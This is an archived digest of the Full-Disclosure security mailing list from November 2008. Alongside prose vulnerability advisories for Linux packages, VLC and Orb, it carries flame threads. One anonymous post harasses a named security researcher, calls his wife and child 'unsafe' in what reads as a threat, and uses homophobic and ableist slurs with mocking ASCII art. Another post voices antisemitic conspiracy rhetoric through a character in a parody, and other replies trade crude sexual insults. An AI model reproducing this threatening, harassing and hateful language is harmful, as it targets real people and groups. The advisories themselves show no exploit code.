URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081107/e4958767/attachment.html From xploitable at gmail.com Fri Nov 7 06:05:17 2008 From: xploitable at gmail.com (n3td3v) Date: Fri, 7 Nov 2008 06:05:17 +0000 Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday In-Reply-To: References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com> <4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com> <296a304a0811061719r316bf9afufce1861c9056109b@mail.gmail.com> <296a304a0811061720n168da0f9j93e60724b0fdd4c1@mail.gmail.com> <4b6ee9310811061734o30d30ab9u99466c42267723ab@mail.gmail.com> <6158bb410811061744qe0d743cs5baeea649471bf40@mail.gmail.com> <4b6ee9310811061802r1f9ec795v64c7d72580c09eac@mail.gmail.com> <4b6ee9310811062046l5cbe5789ja60fb1efa5df0143@mail.gmail.com> Message-ID: <4b6ee9310811062205s6de5f2a6pd1264109468b1ce5@mail.gmail.com> haha, you agree with n3td3v on something! you're making a start at least young padawan. keep up the good work. On Fri, Nov 7, 2008 at 5:09 AM, Biz Marqee wrote: > I could care less about metasploit, all it does is help the kiddies. From vulcanius at gmail.com Fri Nov 7 06:00:10 2008 From: vulcanius at gmail.com (vulcanius) Date: Fri, 7 Nov 2008 01:00:10 -0500 Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday In-Reply-To: <49138E78.2030605@kallisti.se> References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com> <4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com> <49138E78.2030605@kallisti.se> Message-ID: Probably because there's noone on his mailing list despite his claim of 5000 subscribers. Seriously n3td3v, I'd love to hear you answer as to why you continue to troll the FD list with blatant nonsense while you have this amazing list of 5000 some odd subscribers who all want to hear what you have to say. 
On Thu, Nov 6, 2008 at 7:40 PM, Anders B Jansson wrote: > n3td3v wrote: > > blackhats like you will always hate on me, so i just ignore the > > negative responses i get. > > Whitehats hate you equally because you just create spam and don't post > anything of actual value. > > You have your mailing list. > Why can't you just stay there until you have anything of value to disclose? > -- > // hdw > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081107/248e3de9/attachment.html From elazar at hushmail.com Fri Nov 7 06:33:54 2008 From: elazar at hushmail.com (Elazar Broad) Date: Fri, 07 Nov 2008 01:33:54 -0500 Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday Message-ID: <20081107063354.78C1E2003F@smtp.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 What scene... On Thu, 06 Nov 2008 20:06:47 -0500 n3td3v wrote: >i've been monitoring the scene since 1999 so what do you mean no >experience? i make that about 10 years experience if my math is >correct. > >On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee >wrote: >> Do you even understand why people dont like you? It is because >you have all >> these crackpot ideas but no experience to back it up. All your >ideas only >> make sense from a theoretical standpoint, but in practicality >most will >> fail. >> >> On Fri, Nov 7, 2008 at 11:31 AM, n3td3v >wrote: >>> >>> blackhats like you will always hate on me, so i just ignore the >>> negative responses i get. >> > >_______________________________________________ >Full-Disclosure - We believe in it. 
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkkT4VIACgkQi04xwClgpZjqkQP/TCHzaFO3ngEhyXoJPlowTfzidJzg
KyzTUAiLg4AKvqxXg+TSHiIkSDQWqCmzDr0qQ5OqywMgXmbWFNZzAdZuQtf5kW4KDBLx
eclRU3VoqfSCcEMb6puLNQdnHudcVxxZk1dQQdBLlfddHRuX6sGllNkVVvtiaYPnK1U1
QxmDKXU=
=bW8c
-----END PGP SIGNATURE-----

--
Click here to find old friends, lovers or family.
http://tagline.hushmail.com/fc/Ioyw6h4fH5T0ZWneBo4QKHZMbrYp7sz9W8sLWHvULRkY7oBbDmctTq/

From colweb at gmail.com Fri Nov 7 07:18:18 2008
From: colweb at gmail.com (Col)
Date: Fri, 7 Nov 2008 07:18:18 +0000
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <20081107063354.78C1E2003F@smtp.hushmail.com>
References: <20081107063354.78C1E2003F@smtp.hushmail.com>
Message-ID: <1bde4ec50811062318k1f3d51d7rec374a6e7f74dce9@mail.gmail.com>

2008/11/6 n3td3v :
> i'm not sure this is a good idea as it gives a heads up to hackers.
> you may think its not long but its actually 5 days for a hacker to
> figure out potentially a vulnerability in said area. maybe we should
> have a discussion about the pros and cons of these microsoft heads up
> and what the reality of it is for the bad guys to be able to pin point
> and start exploiting a flaw in said area in a 5 day time frame. yours
> n3td3v.

I don't think any hacker is going to bother spending 5 days looking for a needle in a haystack when he can reverse engineer specific files once the patch is released. I know very little of looking for pointers in DLLs but from what I've seen it looks like a bit of a nightmare. The best way is to "diff" two files - the un-patched and the patched then you see where the changes are. Of course if you had thought about it or done *any* research before you posted you would already have made that point.
I am not a white/grey/black/pink hat I'm just an NT Admin type person who monitors this list for Full Disclosure of bugs in software. Instead I have to trawl through your incessant ramblings on most days. Yes I have filters set up in Gmail of course, but I still have to deal with the replies, which before you go on about it are justifiably offensive because you've polluted this list for years with your crap - most have had enough of it.

Now please go and get a job in something completely different so you can sleep through the night like the rest of us.

Regards,
Colin.

From pinar at pardus.org.tr Fri Nov 7 07:33:12 2008
From: pinar at pardus.org.tr (Pınar Yanardağ)
Date: Fri, 07 Nov 2008 09:33:12 +0200
Subject: [Full-disclosure] [PLSA 2008-67] libcdaudio: Buffer Overflow
Message-ID: <4913EF38.40800@pardus.org.tr>

------------------------------------------------------------------------
Pardus Linux Security Advisory 2008-67            security at pardus.org.tr
------------------------------------------------------------------------
Date: 2008-11-07
Severity: 2
Type: Remote
------------------------------------------------------------------------

Summary
=======

A remotely exploitable heap-based buffer overflow was detected in libcdaudio.

Description
===========

Please update your system.

Affected packages:

  Pardus 2008:
    libcdaudio, all before 0.99.12-2-2

Resolution
==========

There are update(s) for libcdaudio.
You can update them via Package Manager or with a single command from console:

  pisi up libcdaudio

References
==========

  * http://bugs.pardus.org.tr/show_bug.cgi?id=8587
  * http://www.openwall.com/lists/oss-security/2008/11/05/1

------------------------------------------------------------------------

--
Pardus Security Team
http://security.pardus.org.tr

From pinar at pardus.org.tr Fri Nov 7 07:27:53 2008
From: pinar at pardus.org.tr (Pınar Yanardağ)
Date: Fri, 07 Nov 2008 09:27:53 +0200
Subject: [Full-disclosure] [PLSA 2008-63] imlib2: Multiple Vulnerabilities
Message-ID: <4913EDF9.2@pardus.org.tr>

------------------------------------------------------------------------
Pardus Linux Security Advisory 2008-63            security at pardus.org.tr
------------------------------------------------------------------------
Date: 2008-11-07
Severity: 3
Type: Remote
------------------------------------------------------------------------

Summary
=======

Some vulnerabilities with unknown impact have been reported in imlib2.

Description
===========

The vulnerabilities are caused due to unspecified errors. No further information is currently available.

Affected packages:

  Pardus 2008:
    imlib2, all before 1.4.2-10-3

Resolution
==========

There are update(s) for imlib2.
You can update them via Package Manager or with a single command from console:

  pisi up imlib2

References
==========

  * http://bugs.pardus.org.tr/show_bug.cgi?id=8570
  * http://sourceforge.net/project/showfiles.php?group_id=2
  * http://secunia.com/advisories/32354/

------------------------------------------------------------------------

--
Pardus Security Team
http://security.pardus.org.tr

From pinar at pardus.org.tr Fri Nov 7 07:30:48 2008
From: pinar at pardus.org.tr (Pınar Yanardağ)
Date: Fri, 07 Nov 2008 09:30:48 +0200
Subject: [Full-disclosure] [PLSA 2008-66] Blender: Arbitrary Code Execution
Message-ID: <4913EEA8.8050106@pardus.org.tr>

------------------------------------------------------------------------
Pardus Linux Security Advisory 2008-66            security at pardus.org.tr
------------------------------------------------------------------------
Date: 2008-11-07
Severity: 2
Type: Local
------------------------------------------------------------------------

Summary
=======

Untrusted search path vulnerability in BPY_interface in Blender 2.46 allows local users to execute arbitrary code via a Trojan horse Python file in the current working directory, related to an erroneous setting of sys.path by the PySys_SetArgv function.

Description
===========

This vulnerability provides administrator access, Allows complete confidentiality, integrity, and availability violation; Allows unauthorized disclosure of information; Allows disruption of service.

Affected packages:

  Pardus 2008:
    blender, all before 2.47-14-3

Resolution
==========

There are update(s) for blender.
You can update them via Package Manager or with a single command from console:

  pisi up blender

References
==========

  * http://bugs.pardus.org.tr/show_bug.cgi?id=8579
  * http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=503632
  * http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4863

------------------------------------------------------------------------

--
Pardus Security Team
http://security.pardus.org.tr

From pinar at pardus.org.tr Fri Nov 7 07:29:42 2008
From: pinar at pardus.org.tr (Pınar Yanardağ)
Date: Fri, 07 Nov 2008 09:29:42 +0200
Subject: [Full-disclosure] [PLSA 2008-64] Dovecot: Multiple Vulnerabilities
Message-ID: <4913EE66.1020609@pardus.org.tr>

Pardus Linux Security Advisory 2008-64            security at pardus.org.tr
------------------------------------------------------------------------
Date: 2008-11-07
Severity: 2
Type: Remote
------------------------------------------------------------------------

Summary
=======

The invalid message address parsing bug is pretty important since it allows a remote user to send broken mail headers and prevent the recipient from accessing the mailbox afterwards, because the process will always just crash trying to parse the header.

Description
===========

This is assuming that the IMAP client uses FETCH ENVELOPE command, not all do.

Affected packages:

  Pardus 2008:
    dovecot, all before 1.1.6-18-3

Resolution
==========

There are update(s) for dovecot.
You can update them via Package Manager or with a single command from console: pisi up dovecot References ========== * http://bugs.pardus.org.tr/show_bug.cgi?id=8572 ------------------------------------------------------------------------ -- Pardus Security Team http://security.pardus.org.tr From gluttony at gmail.com Fri Nov 7 08:23:44 2008 From: gluttony at gmail.com (Andrew A) Date: Fri, 7 Nov 2008 00:23:44 -0800 Subject: [Full-disclosure] What Christianity means to me Message-ID: <1865973b0811070023r11f4405fjabab2fb27928b392@mail.gmail.com> I was recently having an ethics debate where someone said that Christianity was "just what the greeks taught, but dumbed down". I heartily disagreed, and I wanted to put my reasons to text while I still remembered them. Christianity is the ethics of the great Greek classics, for sure. It owes almost all its ethical lineage to those boys in limbo. There's something deeper than that. Jesus isn't just about ethics. He's about passion, love, and most of all, he's about being a time-traveling gangster. I grew up poor. I know what it is like to go without food, or wear the same pair of shoes until they smell and have holes in them. When you're poor, you make poor friends. Let's say you and I grew up in the same trailer park. We had this friend named Chris we met through some BBS. Chris always hung out with the shadiest people. He knew every hooker, hustler and scammer in the tri-state area. Despite that, Chris was the most loving, most real human being we'd ever met. He'd sometimes feed us 10 strips of acid and take us out to the woods to set off some explosives. He'd have our backs when the rich kids tried to beat us up. When we were hungry, he would give us food. Most importantly, Chris gave us a sense of justice. "Man, those fuckin' Jews, with their media and their Federal Reserve-- they have all the money and what do they do with it? Run this country into the ground. 
Try to program every man to be a slave to behaviorism and every daughter that isn't theirs be a whore. Things ain't right." Chris would also give us hope. "This fuckin shithole-- this fuckin' park. You're better than that. You're a good German kid. There's kings in your lineage. You deserve better. Fuck anyone who says otherwise. Your parents are assholes, your teachers are assholes, and you know what? You're an asshole too. But you deserve better. All of you." Chris made us think there was something important in our lives beyond the shitty trailer and the shitty family and the mac and cheese six nights a week. One day, Chris takes too much acid. Freaks out. Starts going into banks, knocking shit over. "You fucking morons! You're agents of the subjugation and slavery of your neighbors! Don't you fuckin' see! Wake the fuck up, stop fucking ruining lives!" He breaks into the vault, burns all the money. Not interested in a cent of it. Chris goes to prison. After he's gone, we all realize what a difference he made in our lives. Without Chris, the walls of our trailers seem really small. We spend our days somber and sad. Then one day, someone says, "let's throw a party". We all eat a little acid, and tell stories about Chris. We'd laugh, we'd remember when our lives were more complete. And through repeating his words about justice, truth, love and hope, we found these in ourselves. And we'd wait. We'd count the days. Until Chris got out of jail. And that, my friends, is the basis of all Christianity. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081107/02c9400a/attachment.html From w3bd3vil at gmail.com Fri Nov 7 08:27:03 2008 From: w3bd3vil at gmail.com (webDEViL) Date: Fri, 7 Nov 2008 13:57:03 +0530 Subject: [Full-disclosure] CVE-2007-5601exploit Message-ID: <8656dcd50811070027w22e1ed11vc6d0c38eadf0f549@mail.gmail.com> Maybe this is of interest to someone.... Not tested. 
This should relate to CVE-2007-5601 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081107/03fb826f/attachment.html From akl at experian.dk Fri Nov 7 08:39:14 2008 From: akl at experian.dk (Anders Klixbull) Date: Fri, 7 Nov 2008 09:39:14 +0100 Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday In-Reply-To: <20081107063354.78C1E2003F@smtp.hushmail.com> References: <20081107063354.78C1E2003F@smtp.hushmail.com> Message-ID: <282134E75BDEB64E943CAF38C80BDD8AD3249A@PRO-EXCHANGESRV.experian.dk> The hardcore cockgobbler scene of scotland -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Elazar Broad Sent: 7. november 2008 07:34 To: full-disclosure at lists.grok.org.uk; xploitable at gmail.com Subject: Re: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 What scene... On Thu, 06 Nov 2008 20:06:47 -0500 n3td3v wrote: >i've been monitoring the scene since 1999 so what do you mean no >experience? i make that about 10 years experience if my math is >correct. > >On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee >wrote: >> Do you even understand why people dont like you? It is because >you have all >> these crackpot ideas but no experience to back it up. All your >ideas only >> make sense from a theoretical standpoint, but in practicality >most will >> fail. >> >> On Fri, Nov 7, 2008 at 11:31 AM, n3td3v >wrote: >>> >>> blackhats like you will always hate on me, so i just ignore the >>> negative responses i get. >> > >_______________________________________________ >Full-Disclosure - We believe in it. 
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ -----BEGIN PGP SIGNATURE----- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQECAAYFAkkT4VIACgkQi04xwClgpZjqkQP/TCHzaFO3ngEhyXoJPlowTfzidJzg KyzTUAiLg4AKvqxXg+TSHiIkSDQWqCmzDr0qQ5OqywMgXmbWFNZzAdZuQtf5kW4KDBLx eclRU3VoqfSCcEMb6puLNQdnHudcVxxZk1dQQdBLlfddHRuX6sGllNkVVvtiaYPnK1U1 QxmDKXU= =bW8c -----END PGP SIGNATURE----- -- Click here to find old friends, lovers or family. http://tagline.hushmail.com/fc/Ioyw6h4fH5T0ZWneBo4QKHZMbrYp7sz9W8sLWHvUL RkY7oBbDmctTq/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From tom.ferris.sucks at gmail.com Fri Nov 7 09:24:41 2008 From: tom.ferris.sucks at gmail.com (ferris sucks dicks) Date: Fri, 7 Nov 2008 01:24:41 -0800 Subject: [Full-disclosure] tom ferris learns yet another lesson once again Message-ID: <22b776f10811070124k2f5d010bn12be760114a548a1@mail.gmail.com> Quit trying to stalk me you fucking weirdo or I will make you look like an even bigger idiot than you've been shown to be on numerous occasions. Your fat mexican wife with a kid that isn't yours is also unsafe. Please realize you are meddling in matters above your head. Below we feature a true to life portrait of Tom Ferris, who seems to constantly get hacked: Adobe, ask youself, why do you employ this guy? He looks like a downs syndrome monkey. __,__ .--. .-" "-. .--. / .. \/ .-. .-. \/ .. \ | | '| / Y \ |' | | | \ \ \ o | o / / / | \ '- ,\.-"`` ``"-./, -' / `'-' /_ ^ ^ _\ '-'` '| \.-----./ | HAY GUYZ CAN U HALP ME INSTALL WORDPRESS? \ \ .-. / / / I CAN'T QUITE SEEM 2 FIGURE OUT HOW TO NOT GET OWNED __'._ '---' _.' WHEN THERE ARE 10 ADVISORIES OUT SAYING NOT TO USE IT ' ':. 
;``"``\ ` by PROFESSOR QUIT FUQN AROUND FAGGOT, PhD, CISSP / '::'::' / ; |':::' '::' / | \ '::' _.-`; ; /`-..--;` ; | | ; ; ; ; ; | | ; ; ; ; ; ; / ,--........,, |; ; ; ; ;/ ; .' -='. | ; ; ; ; / / )) .\ : | ; ; /` .\ _,==" \ .' \; ; ; .'. _ ,_'\.\~" //`. \ .' | ; .___~' \ \- | | /,\ ` \ _.' ~ ; ; ;/ _,.-~'|`| | | _,-''\..--' ~ /; ;/="" |`| |`| _="` ~..==` \\ |`| / /_="` ~` ~ /,\ / /_,)") ~ ~~ _,.-)") ~ ~ _,=~"| ~ =~"|; ;| Tomferrisbird ~ ~ | ; | ============= ~ ~ |;|\ | |/ \| fuck off buddy -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081107/4e5c2c21/attachment.html From xploitable at gmail.com Fri Nov 7 09:43:54 2008 From: xploitable at gmail.com (n3td3v) Date: Fri, 7 Nov 2008 09:43:54 +0000 Subject: [Full-disclosure] Fwd: How are you securing your Wireless Networks? In-Reply-To: <4b6ee9310811070136m5b60177eo16aad5433d5948a2@mail.gmail.com> References: <4b6ee9310811070136m5b60177eo16aad5433d5948a2@mail.gmail.com> Message-ID: <4b6ee9310811070143p29d32a24u116c08af70258e89@mail.gmail.com> ---------- Forwarded message ---------- From: n3td3v Date: Fri, Nov 7, 2008 at 9:36 AM Subject: re:How are you securing your Wireless Networks? To: handlers at sans.org good poll you have doing this, not only do you gain intelligence about your readership, but you have a bunch of ip addresses logged with their respective answers about their wireless posture. answering such a poll could be a security vulnerability in its self but there is no security through obscurity though right? 675 ip addresses so far have been dumb asses and answered your poll. keep up the good work or not as the case may be. to be frank the question is none of your business, but if people are stupid enough to answer it then why the hell not. 
i don't know if its a good trend to have folks asking those types of questions over the internet and have people answer them, the bad guys could leverage a way to exploit such a trend and isc shouldn't be setting up a trend where such questions are asked. its like saying to folks, nobody will ever ask you what your password is via email, and then you setting up a poll asking people what their password is. yeah it really is as dumb as that, but carry on polls of this nature if you think its the right standard to be setting by asking these types of questions over an internet connection where anything or anyone could be electronically capturing the answers, the ip addresses and other information as it flies through the air. good day isc, don't take it personally now, this email is to isc not any individual, so don't come replying with narky comments or do a joel esler by posting the email to internet relay chat and complaining how rude i've been when sending an email to handlers at sans and taking it personally as if the email was personally addressesd to you when it wasn't. damn, you would think joel esler would have known already not to take emails personally that are sent to an organisations email address, but yeah well he paid the price by doing so because i put all his dirty washing out to dry on full-disclosure. take cares isc. From nytrokiss at gmail.com Fri Nov 7 09:53:02 2008 From: nytrokiss at gmail.com (James Matthews) Date: Fri, 7 Nov 2008 11:53:02 +0200 Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed? In-Reply-To: <197321660811031351pdfa5371y121bebb8b8c7396e@mail.gmail.com> References: <197321660811031351pdfa5371y121bebb8b8c7396e@mail.gmail.com> Message-ID: <8a6b8e350811070153u4beb86faw5148e3526e9d4d20@mail.gmail.com> OT i really like the name you put up. 
Gmail asked me if I wanted to "Invite some guy posting to full disclosure to chat"

On Mon, Nov 3, 2008 at 11:51 PM, Some Guy Posting To Full Disclosure <fd.leach at googlemail.com> wrote:
> It's futile trying to use the law to change things.
> It will simply force people into the shadows. Which today involves
> using tor and some Russian web money account.
>
> I read a slogan from before my time, in a book: "If source is outlawed
> outlaws will have source" - same applies to zero days.
>
> Anyway I don't think it should be Illegal. I own a set of lock picks -
> I don't intend to break into someone's house. And if I did I'd go to
> jail (for the burglary and being equipped with picks), until then I'm
> innocent. The UK's law has an attitude like that - I like it!
> Resources should go into actually preventing crimes taking place. Not
> stumbling around hoping that making it awkward for criminals to get
> the tools they need will make a difference.
>
> Simon.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

--
http://www.goldwatches.com/
http://www.jewelerslounge.com/

From nytrokiss at gmail.com Fri Nov 7 09:55:29 2008
From: nytrokiss at gmail.com (James Matthews)
Date: Fri, 7 Nov 2008 11:55:29 +0200
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <282134E75BDEB64E943CAF38C80BDD8AD3249A@PRO-EXCHANGESRV.experian.dk>
References: <20081107063354.78C1E2003F@smtp.hushmail.com> <282134E75BDEB64E943CAF38C80BDD8AD3249A@PRO-EXCHANGESRV.experian.dk>
Message-ID: <8a6b8e350811070155v3c45668cua146e0f2bfdfa8e2@mail.gmail.com>

I love waking up in the morning to read this! Ahh....

On Fri, Nov 7, 2008 at 10:39 AM, Anders Klixbull wrote:
> The hardcore cockgobbler scene of scotland
>
> -----Original Message-----
> From: full-disclosure-bounces at lists.grok.org.uk
> [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Elazar Broad
> Sent: 7. november 2008 07:34
> To: full-disclosure at lists.grok.org.uk; xploitable at gmail.com
> Subject: Re: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
>
> What scene...
>
> On Thu, 06 Nov 2008 20:06:47 -0500 n3td3v wrote:
> >i've been monitoring the scene since 1999 so what do you mean no
> >experience? i make that about 10 years experience if my math is
> >correct.
> >
> >On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee wrote:
> >> Do you even understand why people don't like you? It is because you have all
> >> these crackpot ideas but no experience to back it up. All your ideas only
> >> make sense from a theoretical standpoint, but in practicality most will
> >> fail.
> >>
> >> On Fri, Nov 7, 2008 at 11:31 AM, n3td3v wrote:
> >>>
> >>> blackhats like you will always hate on me, so i just ignore the
> >>> negative responses i get.
>

--
http://www.goldwatches.com/
http://www.jewelerslounge.com/

From tom.ferris.sucks at gmail.com Fri Nov 7 10:18:42 2008
From: tom.ferris.sucks at gmail.com (ferris sucks dicks)
Date: Fri, 7 Nov 2008 02:18:42 -0800
Subject: [Full-disclosure] tom ferris sucks balls
Message-ID: <22b776f10811070218u4baee580x8eb28967d808127@mail.gmail.com>

hey buddy heres another link in case the formattings fucked on the other 1

http://rapidshare.com/files/161452864/tf.txt.html

From akl at experian.dk Fri Nov 7 10:22:31 2008
From: akl at experian.dk (Anders Klixbull)
Date: Fri, 7 Nov 2008 11:22:31 +0100
Subject: [Full-disclosure] tom ferris sucks balls
In-Reply-To: <22b776f10811070218u4baee580x8eb28967d808127@mail.gmail.com>
References: <22b776f10811070218u4baee580x8eb28967d808127@mail.gmail.com>
Message-ID: <282134E75BDEB64E943CAF38C80BDD8AD3249B@PRO-EXCHANGESRV.experian.dk>

TEH TXT FIEL FORMATTING SI TEH FUCKED

________________________________
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of ferris sucks dicks
Sent: 7. november 2008 11:19
To: full-disclosure at lists.grok.org.uk
Subject: [Full-disclosure] tom ferris sucks balls

hey buddy heres another link in case the formattings fucked on the other 1

http://rapidshare.com/files/161452864/tf.txt.html

From anonymouspimp at gmail.com Fri Nov 7 13:22:23 2008
From: anonymouspimp at gmail.com (anonymous pimp)
Date: Fri, 7 Nov 2008 15:22:23 +0200
Subject: [Full-disclosure] What Christianity means to me
In-Reply-To: <1865973b0811070023r11f4405fjabab2fb27928b392@mail.gmail.com>
References: <1865973b0811070023r11f4405fjabab2fb27928b392@mail.gmail.com>
Message-ID: <2d792fb20811070522u3324c170h27f52cd19b86ef4b@mail.gmail.com>

> And that, my friends, is the basis of all Christianity.

No it isn't. "Christianity is... based on the teachings of Jesus Christ" [0]

[0] http://www.bbc.co.uk/religion/religions/christianity/

--
anonymouspimp

From marc.deslauriers at canonical.com Thu Nov 6 18:45:26 2008
From: marc.deslauriers at canonical.com (Marc Deslauriers)
Date: Thu, 06 Nov 2008 13:45:26 -0500
Subject: [Full-disclosure] [USN-664-1] Tk vulnerability
Message-ID: <1225997126.9467.6.camel@mdlinux>

===========================================================
Ubuntu Security Notice USN-664-1          November 06, 2008
tk8.0, tk8.3, tk8.4 vulnerability
CVE-2008-0553
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  tk8.0    8.0.5-11ubuntu0.1
  tk8.3    8.3.5-4ubuntu1.2
  tk8.4    8.4.12-0ubuntu1.2

Ubuntu 7.10:
  tk8.3    8.3.5-6ubuntu3.1
  tk8.4    8.4.15-1ubuntu1.1

Ubuntu 8.04 LTS:
  tk8.4    8.4.16-2ubuntu1.1

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

It was discovered that Tk could be made to overrun a buffer when loading certain images. If a user were tricked into opening a specially crafted GIF image, remote attackers could cause a denial of service or execute arbitrary code with user privileges.

From tk at trapkit.de Thu Nov 6 18:38:55 2008
From: tk at trapkit.de (Tobias Klein)
Date: Thu, 06 Nov 2008 19:38:55 +0100
Subject: [Full-disclosure] [TKADV2008-011] VLC media player RealText Processing Stack Overflow Vulnerability
Message-ID: <491339BF.8000409@trapkit.de>

Please find attached a detailed advisory of the vulnerability.

Alternatively, the advisory can also be found at:
http://www.trapkit.de/advisories/TKADV2008-011.txt

-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: TKADV2008-011.txt
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081106/33b13b66/attachment.txt

From tk at trapkit.de Thu Nov 6 18:38:59 2008
From: tk at trapkit.de (Tobias Klein)
Date: Thu, 06 Nov 2008 19:38:59 +0100
Subject: [Full-disclosure] [TKADV2008-012] VLC media player cue Processing Stack Overflow Vulnerability
Message-ID: <491339C3.5060506@trapkit.de>

Please find attached a detailed advisory of the vulnerability.

Alternatively, the advisory can also be found at:
http://www.trapkit.de/advisories/TKADV2008-012.txt

-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: TKADV2008-012.txt
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081106/273a8c6d/attachment.txt

From DDI.VulnerabilityAlert at ddifrontline.com Thu Nov 6 19:59:22 2008
From: DDI.VulnerabilityAlert at ddifrontline.com (DDI_Vulnerability_Alert)
Date: Thu, 6 Nov 2008 13:59:22 -0600
Subject: [Full-disclosure] DDIVRT-2008-17 Orb Directory Traversal
Message-ID: <2571D31D42513640AE1632FEE100E0E402DD7438@hypercom.defense.local>

Title
-----
DDIVRT-2008-17 Orb Directory Traversal

Severity
--------
High

Date Discovered
---------------
October, 21st 2008

Discovered By
-------------
Digital Defense, Inc. Vulnerability Research Team
Credit: Steven James and r at b13$

Vulnerability Description
-------------------------
Orb Networks' Orb media server is vulnerable to directory traversal attacks. Users can leverage specially crafted GET requests to read arbitrary files.

Solution Description
--------------------
Use firewall rules to restrict access to authorized users of the Orb server. This issue is fixed in version 2.01.0022 available at http://www.orb.com/download/us/setup_2.01.0022.exe

Tested Systems / Software (with versions)
------------------------------------------
Orb version 2.01.0017 on Windows XP Pro SP2
Nullsoft Winamp Remote Server Beta (featuring Orb version 2.01.0013) on Windows XP Pro SP2

Vendor Contact
--------------
Orb Networks
Website: http://www.orb.com

From marc.deslauriers at canonical.com Thu Nov 6 22:22:27 2008
From: marc.deslauriers at canonical.com (Marc Deslauriers)
Date: Thu, 06 Nov 2008 17:22:27 -0500
Subject: [Full-disclosure] [USN-665-1] Netpbm vulnerability
Message-ID: <1226010147.9467.7.camel@mdlinux>

===========================================================
Ubuntu Security Notice USN-665-1          November 06, 2008
netpbm-free vulnerability
CVE-2008-0554
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  netpbm    2:10.0-10ubuntu1.1

Ubuntu 7.10:
  netpbm    2:10.0-11ubuntu0.1

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

It was discovered that Netpbm could be made to overrun a buffer when loading certain images. If a user were tricked into opening a specially crafted GIF image, remote attackers could cause a denial of service or execute arbitrary code with user privileges.

From Valdis.Kletnieks at vt.edu Fri Nov 7 16:18:01 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Fri, 07 Nov 2008 11:18:01 -0500
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: Your message of "Fri, 07 Nov 2008 07:18:18 GMT." <1bde4ec50811062318k1f3d51d7rec374a6e7f74dce9@mail.gmail.com>
References: <20081107063354.78C1E2003F@smtp.hushmail.com> <1bde4ec50811062318k1f3d51d7rec374a6e7f74dce9@mail.gmail.com>
Message-ID: <19028.1226074681@turing-police.cc.vt.edu>

On Fri, 07 Nov 2008 07:18:18 GMT, Col said:

> I don't think any hacker is going to bother spending 5 days looking
> for a needle in a haystack when he can reverse engineer specific files
> once the patch is released. I know very little of looking for pointers
> in DLLs but from what I've seen it looks like a bit of a nightmare.
> The best way is to "diff" two files - the un-patched and the patched
> then you see where the changes are.

You're closer than most, but nobody's nailed the *actual* trade-off involved:

1) Large sites need a heads-up so they can form at least a rough estimate of how much time/effort they will need to put in to deploying patches before the guys who are doing diffs of binaries get their exploits.
